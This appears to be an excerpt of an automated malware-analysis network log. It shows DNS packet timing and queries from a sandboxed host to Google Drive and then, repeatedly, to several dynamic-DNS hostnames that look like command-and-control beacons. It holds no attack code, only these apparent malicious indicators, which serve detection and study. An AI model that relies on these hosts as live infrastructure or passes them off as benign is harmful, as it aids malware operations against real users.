Nov 30, 2024 21:22:06.033982992 CET	63067	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:22:06.171287060 CET	53	63067	1.1.1.1	192.168.2.4
Nov 30, 2024 21:22:06.894414902 CET	61809	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:22:07.033813000 CET	53	61809	1.1.1.1	192.168.2.4
Nov 30, 2024 21:22:08.954592943 CET	50715	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:22:09.092350960 CET	53	50715	1.1.1.1	192.168.2.4
Nov 30, 2024 21:22:09.893695116 CET	60382	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:22:10.031711102 CET	53	60382	1.1.1.1	192.168.2.4
Nov 30, 2024 21:22:10.893994093 CET	60693	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:22:11.035233974 CET	53	60693	1.1.1.1	192.168.2.4
Nov 30, 2024 21:22:11.038041115 CET	61198	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:22:11.178034067 CET	53	61198	1.1.1.1	192.168.2.4
Nov 30, 2024 21:22:11.907481909 CET	63464	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:22:12.046544075 CET	53	63464	1.1.1.1	192.168.2.4
Nov 30, 2024 21:22:13.894856930 CET	62859	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:22:14.033360958 CET	53	62859	1.1.1.1	192.168.2.4
Nov 30, 2024 21:22:14.895778894 CET	61878	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:22:15.034040928 CET	53	61878	1.1.1.1	192.168.2.4
Nov 30, 2024 21:22:16.047391891 CET	56732	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:22:16.185717106 CET	53	56732	1.1.1.1	192.168.2.4
Nov 30, 2024 21:22:16.186364889 CET	63585	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:22:16.323441029 CET	53	63585	1.1.1.1	192.168.2.4
Nov 30, 2024 21:22:16.894490957 CET	53097	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:22:17.033569098 CET	53	53097	1.1.1.1	192.168.2.4
Nov 30, 2024 21:22:18.971487045 CET	52235	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:22:19.110893011 CET	53	52235	1.1.1.1	192.168.2.4
Nov 30, 2024 21:22:19.894455910 CET	54170	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:22:20.032308102 CET	53	54170	1.1.1.1	192.168.2.4
Nov 30, 2024 21:22:20.894190073 CET	52906	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:22:21.031917095 CET	53	52906	1.1.1.1	192.168.2.4
Nov 30, 2024 21:22:21.034493923 CET	63071	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:22:21.173793077 CET	53	63071	1.1.1.1	192.168.2.4
Nov 30, 2024 21:22:21.894244909 CET	64866	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:22:22.032862902 CET	53	64866	1.1.1.1	192.168.2.4
Nov 30, 2024 21:22:23.894102097 CET	49988	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:22:24.033253908 CET	53	49988	1.1.1.1	192.168.2.4
Nov 30, 2024 21:22:24.893747091 CET	63788	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:22:25.031771898 CET	53	63788	1.1.1.1	192.168.2.4
Nov 30, 2024 21:22:25.897209883 CET	54363	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:22:26.035830021 CET	53	54363	1.1.1.1	192.168.2.4
Nov 30, 2024 21:22:26.039719105 CET	58645	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:22:26.177804947 CET	53	58645	1.1.1.1	192.168.2.4
Nov 30, 2024 21:22:26.895644903 CET	50244	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:22:27.033402920 CET	53	50244	1.1.1.1	192.168.2.4
Nov 30, 2024 21:22:28.894454956 CET	64175	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:22:29.032239914 CET	53	64175	1.1.1.1	192.168.2.4
Nov 30, 2024 21:22:29.894033909 CET	57476	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:22:30.033364058 CET	53	57476	1.1.1.1	192.168.2.4
Nov 30, 2024 21:22:30.893975973 CET	52611	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:22:31.031441927 CET	53	52611	1.1.1.1	192.168.2.4
Nov 30, 2024 21:22:31.032670975 CET	51940	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:22:31.170001030 CET	53	51940	1.1.1.1	192.168.2.4
Nov 30, 2024 21:22:31.896282911 CET	54580	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:22:32.033715963 CET	53	54580	1.1.1.1	192.168.2.4
Nov 30, 2024 21:22:33.901356936 CET	51554	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:22:34.040313005 CET	53	51554	1.1.1.1	192.168.2.4
Nov 30, 2024 21:22:34.897907019 CET	56544	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:22:35.036195040 CET	53	56544	1.1.1.1	192.168.2.4
Nov 30, 2024 21:22:35.894407988 CET	63627	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:22:36.032011986 CET	53	63627	1.1.1.1	192.168.2.4
Nov 30, 2024 21:22:36.033179998 CET	51362	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:22:36.171250105 CET	53	51362	1.1.1.1	192.168.2.4
Nov 30, 2024 21:22:36.893930912 CET	57367	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:22:37.031719923 CET	53	57367	1.1.1.1	192.168.2.4
Nov 30, 2024 21:22:38.896024942 CET	63619	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:22:39.033891916 CET	53	63619	1.1.1.1	192.168.2.4
Nov 30, 2024 21:22:39.893729925 CET	63655	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:22:40.032228947 CET	53	63655	1.1.1.1	192.168.2.4
Nov 30, 2024 21:22:41.044411898 CET	54755	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:22:41.185431004 CET	53	54755	1.1.1.1	192.168.2.4
Nov 30, 2024 21:22:41.208519936 CET	49263	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:22:41.346797943 CET	53	49263	1.1.1.1	192.168.2.4
Nov 30, 2024 21:22:41.894480944 CET	58242	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:22:42.032397985 CET	53	58242	1.1.1.1	192.168.2.4
Nov 30, 2024 21:22:44.160908937 CET	57090	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:22:44.311522007 CET	53	57090	1.1.1.1	192.168.2.4
Nov 30, 2024 21:22:44.894124985 CET	58127	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:22:45.031418085 CET	53	58127	1.1.1.1	192.168.2.4
Nov 30, 2024 21:22:45.894345045 CET	51118	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:22:46.031945944 CET	53	51118	1.1.1.1	192.168.2.4
Nov 30, 2024 21:22:46.032603025 CET	64192	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:22:46.170934916 CET	53	64192	1.1.1.1	192.168.2.4
Nov 30, 2024 21:22:46.894747972 CET	57891	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:22:47.036725998 CET	53	57891	1.1.1.1	192.168.2.4
Nov 30, 2024 21:22:48.894639969 CET	52269	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:22:49.032753944 CET	53	52269	1.1.1.1	192.168.2.4
Nov 30, 2024 21:22:49.894375086 CET	56084	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:22:50.032308102 CET	53	56084	1.1.1.1	192.168.2.4
Nov 30, 2024 21:22:50.894263983 CET	52256	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:22:51.032787085 CET	53	52256	1.1.1.1	192.168.2.4
Nov 30, 2024 21:22:51.033308029 CET	60726	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:22:51.171475887 CET	53	60726	1.1.1.1	192.168.2.4
Nov 30, 2024 21:22:51.174865007 CET	60726	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:22:51.312465906 CET	53	60726	1.1.1.1	192.168.2.4
Nov 30, 2024 21:22:51.893868923 CET	54689	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:22:52.031429052 CET	53	54689	1.1.1.1	192.168.2.4
Nov 30, 2024 21:22:53.895992041 CET	59051	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:22:54.034245968 CET	53	59051	1.1.1.1	192.168.2.4
Nov 30, 2024 21:22:54.894814014 CET	62917	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:22:55.032613039 CET	53	62917	1.1.1.1	192.168.2.4
Nov 30, 2024 21:22:55.893929958 CET	49957	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:22:56.031532049 CET	53	49957	1.1.1.1	192.168.2.4
Nov 30, 2024 21:22:56.032218933 CET	51822	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:22:56.169811010 CET	53	51822	1.1.1.1	192.168.2.4
Nov 30, 2024 21:22:56.894174099 CET	56622	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:22:57.032494068 CET	53	56622	1.1.1.1	192.168.2.4
Nov 30, 2024 21:22:58.987997055 CET	60163	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:22:59.129470110 CET	53	60163	1.1.1.1	192.168.2.4
Nov 30, 2024 21:22:59.893984079 CET	52959	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:23:00.034337997 CET	53	52959	1.1.1.1	192.168.2.4
Nov 30, 2024 21:23:00.893949032 CET	56438	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:23:01.036710024 CET	53	56438	1.1.1.1	192.168.2.4
Nov 30, 2024 21:23:01.039454937 CET	51352	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:23:01.176973104 CET	53	51352	1.1.1.1	192.168.2.4
Nov 30, 2024 21:23:02.390722036 CET	52641	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:23:02.529261112 CET	53	52641	1.1.1.1	192.168.2.4
Nov 30, 2024 21:23:03.895972967 CET	56628	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:23:04.033869028 CET	53	56628	1.1.1.1	192.168.2.4
Nov 30, 2024 21:23:05.071913004 CET	56128	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:23:05.209526062 CET	53	56128	1.1.1.1	192.168.2.4
Nov 30, 2024 21:23:05.900295973 CET	56303	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:23:06.038045883 CET	53	56303	1.1.1.1	192.168.2.4
Nov 30, 2024 21:23:06.042884111 CET	60161	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:23:06.181725979 CET	53	60161	1.1.1.1	192.168.2.4
Nov 30, 2024 21:23:06.894731045 CET	49395	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:23:07.032265902 CET	53	49395	1.1.1.1	192.168.2.4
Nov 30, 2024 21:23:08.893817902 CET	59429	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:23:09.033204079 CET	53	59429	1.1.1.1	192.168.2.4
Nov 30, 2024 21:23:09.894622087 CET	50987	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:23:10.032747984 CET	53	50987	1.1.1.1	192.168.2.4
Nov 30, 2024 21:23:10.894462109 CET	54466	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:23:11.032233000 CET	53	54466	1.1.1.1	192.168.2.4
Nov 30, 2024 21:23:11.033781052 CET	49702	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:23:11.170969009 CET	53	49702	1.1.1.1	192.168.2.4
Nov 30, 2024 21:23:11.893923998 CET	59915	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:23:12.031757116 CET	53	59915	1.1.1.1	192.168.2.4
Nov 30, 2024 21:23:13.894675970 CET	60902	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:23:14.032701015 CET	53	60902	1.1.1.1	192.168.2.4
Nov 30, 2024 21:23:14.921612978 CET	51425	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:23:15.059763908 CET	53	51425	1.1.1.1	192.168.2.4
Nov 30, 2024 21:23:15.893888950 CET	50222	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:23:16.033082008 CET	53	50222	1.1.1.1	192.168.2.4
Nov 30, 2024 21:23:16.033884048 CET	59365	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:23:16.174874067 CET	59365	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:23:16.175368071 CET	53	59365	1.1.1.1	192.168.2.4
Nov 30, 2024 21:23:16.315465927 CET	53	59365	1.1.1.1	192.168.2.4
Nov 30, 2024 21:23:16.894491911 CET	50797	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:23:17.033974886 CET	53	50797	1.1.1.1	192.168.2.4
Nov 30, 2024 21:23:18.894267082 CET	63769	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:23:19.032387972 CET	53	63769	1.1.1.1	192.168.2.4
Nov 30, 2024 21:23:19.894587040 CET	50369	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:23:20.033411026 CET	53	50369	1.1.1.1	192.168.2.4
Nov 30, 2024 21:23:20.912005901 CET	53983	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:23:21.049823999 CET	53	53983	1.1.1.1	192.168.2.4
Nov 30, 2024 21:23:21.056905985 CET	57995	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:23:21.194648981 CET	53	57995	1.1.1.1	192.168.2.4
Nov 30, 2024 21:23:21.894498110 CET	50624	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:23:22.036382914 CET	53	50624	1.1.1.1	192.168.2.4
Nov 30, 2024 21:23:23.894733906 CET	52596	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:23:24.032818079 CET	53	52596	1.1.1.1	192.168.2.4
Nov 30, 2024 21:23:24.897948027 CET	59059	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:23:25.036967039 CET	53	59059	1.1.1.1	192.168.2.4
Nov 30, 2024 21:23:25.893898010 CET	57265	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:23:26.031646967 CET	53	57265	1.1.1.1	192.168.2.4
Nov 30, 2024 21:23:26.032262087 CET	54360	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:23:26.169893026 CET	53	54360	1.1.1.1	192.168.2.4
Nov 30, 2024 21:23:26.896938086 CET	65343	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:23:27.037770987 CET	53	65343	1.1.1.1	192.168.2.4
Nov 30, 2024 21:23:28.894193888 CET	57359	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:23:29.031872988 CET	53	57359	1.1.1.1	192.168.2.4
Nov 30, 2024 21:23:29.893872976 CET	56210	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:23:30.031769991 CET	53	56210	1.1.1.1	192.168.2.4
Nov 30, 2024 21:23:31.042069912 CET	50622	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:23:31.180980921 CET	53	50622	1.1.1.1	192.168.2.4
Nov 30, 2024 21:23:31.323503017 CET	49982	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:23:31.462622881 CET	53	49982	1.1.1.1	192.168.2.4
Nov 30, 2024 21:23:31.897393942 CET	49990	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:23:32.035029888 CET	53	49990	1.1.1.1	192.168.2.4
Nov 30, 2024 21:23:33.917188883 CET	61270	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:23:34.055821896 CET	53	61270	1.1.1.1	192.168.2.4
Nov 30, 2024 21:23:34.898171902 CET	49594	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:23:35.038058043 CET	53	49594	1.1.1.1	192.168.2.4
Nov 30, 2024 21:23:35.904215097 CET	50889	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:23:36.041708946 CET	53	50889	1.1.1.1	192.168.2.4
Nov 30, 2024 21:23:36.042309999 CET	63348	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:23:36.179821968 CET	53	63348	1.1.1.1	192.168.2.4
Nov 30, 2024 21:23:36.893954039 CET	58303	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:23:37.036088943 CET	53	58303	1.1.1.1	192.168.2.4
Nov 30, 2024 21:23:38.894542933 CET	53557	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:23:39.033771992 CET	53	53557	1.1.1.1	192.168.2.4
Nov 30, 2024 21:23:39.894397974 CET	50723	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:23:40.032119989 CET	53	50723	1.1.1.1	192.168.2.4
Nov 30, 2024 21:23:40.894722939 CET	63084	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:23:41.032737970 CET	53	63084	1.1.1.1	192.168.2.4
Nov 30, 2024 21:23:41.034581900 CET	50105	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:23:41.172506094 CET	53	50105	1.1.1.1	192.168.2.4
Nov 30, 2024 21:23:41.894500971 CET	51942	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:23:42.032419920 CET	53	51942	1.1.1.1	192.168.2.4
Nov 30, 2024 21:23:43.894792080 CET	65327	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:23:44.032227993 CET	53	65327	1.1.1.1	192.168.2.4
Nov 30, 2024 21:23:44.912839890 CET	57172	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:23:45.057555914 CET	53	57172	1.1.1.1	192.168.2.4
Nov 30, 2024 21:23:45.894596100 CET	54035	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:23:46.032932997 CET	53	54035	1.1.1.1	192.168.2.4
Nov 30, 2024 21:23:46.033504963 CET	53292	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:23:46.173079014 CET	53	53292	1.1.1.1	192.168.2.4
Nov 30, 2024 21:23:46.896095991 CET	62286	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:23:47.036376953 CET	53	62286	1.1.1.1	192.168.2.4
Nov 30, 2024 21:23:48.895133972 CET	59058	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:23:49.032840014 CET	53	59058	1.1.1.1	192.168.2.4
Nov 30, 2024 21:23:49.894546986 CET	63670	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:23:50.033149958 CET	53	63670	1.1.1.1	192.168.2.4
Nov 30, 2024 21:23:50.933762074 CET	63629	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:23:51.071342945 CET	53	63629	1.1.1.1	192.168.2.4
Nov 30, 2024 21:23:51.089996099 CET	58396	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:23:51.227725029 CET	53	58396	1.1.1.1	192.168.2.4
Nov 30, 2024 21:23:51.894078016 CET	62782	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:23:52.033319950 CET	53	62782	1.1.1.1	192.168.2.4
Nov 30, 2024 21:23:53.967255116 CET	58667	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:23:54.105110884 CET	53	58667	1.1.1.1	192.168.2.4
Nov 30, 2024 21:23:54.894319057 CET	57863	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:23:55.032008886 CET	53	57863	1.1.1.1	192.168.2.4
Nov 30, 2024 21:23:55.896119118 CET	59617	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:23:56.033998966 CET	53	59617	1.1.1.1	192.168.2.4
Nov 30, 2024 21:23:56.039056063 CET	61391	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:23:56.176542997 CET	53	61391	1.1.1.1	192.168.2.4
Nov 30, 2024 21:23:56.894437075 CET	57578	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:23:57.034570932 CET	53	57578	1.1.1.1	192.168.2.4
Nov 30, 2024 21:23:58.894309998 CET	59214	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:23:59.035414934 CET	53	59214	1.1.1.1	192.168.2.4
Nov 30, 2024 21:23:59.893861055 CET	62607	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:24:00.034126997 CET	53	62607	1.1.1.1	192.168.2.4
Nov 30, 2024 21:24:00.894426107 CET	61632	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:24:01.032318115 CET	53	61632	1.1.1.1	192.168.2.4
Nov 30, 2024 21:24:01.032838106 CET	58989	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:24:01.175004959 CET	58989	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:24:01.176018953 CET	53	58989	1.1.1.1	192.168.2.4
Nov 30, 2024 21:24:01.315201044 CET	53	58989	1.1.1.1	192.168.2.4
Nov 30, 2024 21:24:01.894547939 CET	53101	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:24:02.034182072 CET	53	53101	1.1.1.1	192.168.2.4
Nov 30, 2024 21:24:06.316018105 CET	64323	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:24:06.454674959 CET	53	64323	1.1.1.1	192.168.2.4
Nov 30, 2024 21:24:06.455260038 CET	52155	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:24:06.592855930 CET	53	52155	1.1.1.1	192.168.2.4
Nov 30, 2024 21:24:06.593436956 CET	52272	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:24:06.732630014 CET	53	52272	1.1.1.1	192.168.2.4
Nov 30, 2024 21:24:06.733108044 CET	60223	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:24:06.870774984 CET	53	60223	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 30, 2024 21:19:58.788635015 CET	192.168.2.4	1.1.1.1	0x56e2	Standard query (0)	drive.google.com	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:20:01.868774891 CET	192.168.2.4	1.1.1.1	0xfb50	Standard query (0)	drive.usercontent.google.com	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:20:13.051811934 CET	192.168.2.4	1.1.1.1	0xe2ee	Standard query (0)	freshmeetre1ms.freeddns.org	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:20:13.921463013 CET	192.168.2.4	1.1.1.1	0xcc92	Standard query (0)	freshmysweeterbk.ddns.net	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:20:14.165776968 CET	192.168.2.4	1.1.1.1	0x25d6	Standard query (0)	mysweeterbk.ddns.net	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:20:14.399770975 CET	192.168.2.4	1.1.1.1	0xb7b2	Standard query (0)	bbhmeetre1ms.freeddns.org	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:20:14.729773045 CET	192.168.2.4	1.1.1.1	0x953a	Standard query (0)	myumysmeetr.ddns.net	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:20:14.960141897 CET	192.168.2.4	1.1.1.1	0xd80b	Standard query (0)	meetre1ms.freeddns.org	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:20:18.373158932 CET	192.168.2.4	1.1.1.1	0x4194	Standard query (0)	freshmeetre1ms.freeddns.org	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:20:19.524996042 CET	192.168.2.4	1.1.1.1	0x6726	Standard query (0)	freshmysweeterbk.ddns.net	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:20:19.664894104 CET	192.168.2.4	1.1.1.1	0xf3cc	Standard query (0)	mysweeterbk.ddns.net	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:20:19.811276913 CET	192.168.2.4	1.1.1.1	0x2d25	Standard query (0)	bbhmeetre1ms.freeddns.org	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:20:19.953778028 CET	192.168.2.4	1.1.1.1	0xce21	Standard query (0)	meetre1ms.freeddns.org	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:20:23.181216002 CET	192.168.2.4	1.1.1.1	0xd8c7	Standard query (0)	freshmeetre1ms.freeddns.org	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:20:24.356708050 CET	192.168.2.4	1.1.1.1	0x8044	Standard query (0)	freshmysweeterbk.ddns.net	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:20:24.496412039 CET	192.168.2.4	1.1.1.1	0xa748	Standard query (0)	mysweeterbk.ddns.net	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:20:24.638699055 CET	192.168.2.4	1.1.1.1	0xa4ff	Standard query (0)	bbhmeetre1ms.freeddns.org	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:20:25.968305111 CET	192.168.2.4	1.1.1.1	0x57c8	Standard query (0)	meetre1ms.freeddns.org	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:20:28.927884102 CET	192.168.2.4	1.1.1.1	0xc842	Standard query (0)	freshmeetre1ms.freeddns.org	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:20:29.066862106 CET	192.168.2.4	1.1.1.1	0xf0d5	Standard query (0)	freshmysweeterbk.ddns.net	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:20:29.206114054 CET	192.168.2.4	1.1.1.1	0x4feb	Standard query (0)	mysweeterbk.ddns.net	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:20:29.344914913 CET	192.168.2.4	1.1.1.1	0x7bb4	Standard query (0)	bbhmeetre1ms.freeddns.org	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:20:31.508605957 CET	192.168.2.4	1.1.1.1	0xaa02	Standard query (0)	meetre1ms.freeddns.org	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:20:34.742742062 CET	192.168.2.4	1.1.1.1	0xe99c	Standard query (0)	freshmeetre1ms.freeddns.org	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:20:34.883137941 CET	192.168.2.4	1.1.1.1	0x658d	Standard query (0)	freshmysweeterbk.ddns.net	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:20:35.031610966 CET	192.168.2.4	1.1.1.1	0xd9cc	Standard query (0)	mysweeterbk.ddns.net	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:20:35.170341969 CET	192.168.2.4	1.1.1.1	0x4f37	Standard query (0)	bbhmeetre1ms.freeddns.org	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:20:36.414865971 CET	192.168.2.4	1.1.1.1	0x83f3	Standard query (0)	meetre1ms.freeddns.org	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:20:39.597009897 CET	192.168.2.4	1.1.1.1	0x266d	Standard query (0)	freshmeetre1ms.freeddns.org	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:20:40.739792109 CET	192.168.2.4	1.1.1.1	0xb478	Standard query (0)	freshmysweeterbk.ddns.net	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:20:40.879400969 CET	192.168.2.4	1.1.1.1	0xe5cb	Standard query (0)	mysweeterbk.ddns.net	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:20:41.037494898 CET	192.168.2.4	1.1.1.1	0xbe07	Standard query (0)	bbhmeetre1ms.freeddns.org	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:20:41.207196951 CET	192.168.2.4	1.1.1.1	0x33a9	Standard query (0)	meetre1ms.freeddns.org	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:20:44.380466938 CET	192.168.2.4	1.1.1.1	0xf94b	Standard query (0)	freshmeetre1ms.freeddns.org	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:20:45.534804106 CET	192.168.2.4	1.1.1.1	0xef6f	Standard query (0)	freshmysweeterbk.ddns.net	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:20:46.690948963 CET	192.168.2.4	1.1.1.1	0xaaf6	Standard query (0)	mysweeterbk.ddns.net	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:20:46.866139889 CET	192.168.2.4	1.1.1.1	0xece2	Standard query (0)	bbhmeetre1ms.freeddns.org	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:20:47.011625051 CET	192.168.2.4	1.1.1.1	0x29f0	Standard query (0)	meetre1ms.freeddns.org	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:20:49.175127029 CET	192.168.2.4	1.1.1.1	0x5bed	Standard query (0)	freshmeetre1ms.freeddns.org	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:20:50.331707954 CET	192.168.2.4	1.1.1.1	0xe7fd	Standard query (0)	freshmysweeterbk.ddns.net	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:20:51.472702026 CET	192.168.2.4	1.1.1.1	0x3942	Standard query (0)	mysweeterbk.ddns.net	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:20:51.612708092 CET	192.168.2.4	1.1.1.1	0x6e47	Standard query (0)	bbhmeetre1ms.freeddns.org	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:20:52.775780916 CET	192.168.2.4	1.1.1.1	0x91d2	Standard query (0)	meetre1ms.freeddns.org	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:20:53.925158978 CET	192.168.2.4	1.1.1.1	0x585c	Standard query (0)	freshmeetre1ms.freeddns.org	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:20:55.079088926 CET	192.168.2.4	1.1.1.1	0xc9f8	Standard query (0)	freshmysweeterbk.ddns.net	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:20:56.191185951 CET	192.168.2.4	1.1.1.1	0x194f	Standard query (0)	mysweeterbk.ddns.net	A (IP address)	IN (0x0001)	false
